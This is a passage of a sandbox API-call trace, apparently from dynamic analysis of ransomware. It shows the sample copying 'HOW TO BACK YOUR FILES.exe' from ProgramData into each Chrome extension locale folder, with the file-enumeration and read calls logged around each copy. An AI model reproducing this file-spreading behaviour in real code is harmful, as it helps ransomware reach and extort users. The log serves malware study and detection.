(lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.948] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.948] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil" [0104.948] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.948] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.948] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.949] GetLastError () returned 0x0 [0104.949] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.949] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.949] CloseHandle (hObject=0x120) returned 1 [0104.949] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.949] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6db69a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6db69a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.949] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.949] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.949] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi" [0104.949] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.949] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.950] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.950] GetLastError () returned 0x0 [0104.950] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.950] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.951] CloseHandle (hObject=0x120) returned 1 [0104.951] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.951] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6db69a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6db69a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.951] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.952] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.952] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es" [0104.952] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.952] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.952] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.953] GetLastError () returned 0x0 [0104.953] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.953] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.953] CloseHandle (hObject=0x120) returned 1 [0104.953] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.953] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6db8fbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6db8fbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.953] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.953] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.953] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en" [0104.953] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.953] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.954] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.954] GetLastError () returned 0x0 [0104.954] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.954] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.954] CloseHandle (hObject=0x120) returned 1 [0104.955] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.955] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6db8fbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6db8fbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.955] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.955] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.955] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el" [0104.955] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.955] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.956] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.956] GetLastError () returned 0x0 [0104.956] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.956] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.956] CloseHandle (hObject=0x120) returned 1 [0104.956] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.956] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6dbb5d20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6dbb5d20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.957] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.957] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.957] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de" [0104.957] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.958] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.959] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.959] GetLastError () returned 0x0 [0104.959] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.959] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.959] CloseHandle (hObject=0x120) returned 1 [0104.959] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.959] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6dbb5d20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6dbb5d20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.959] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.959] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.960] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da" [0104.960] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.960] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.960] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.961] GetLastError () returned 0x0 [0104.961] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.961] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.961] CloseHandle (hObject=0x120) returned 1 [0104.961] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.961] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6dc01fe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6dc01fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.961] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.961] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.962] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs" [0104.962] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.962] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.963] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.963] GetLastError () returned 0x0 [0104.963] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.963] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.963] CloseHandle (hObject=0x120) returned 1 [0104.963] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.963] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869b0010, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6dc01fe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6dc01fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.963] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.963] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.963] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca" [0104.964] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.964] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js 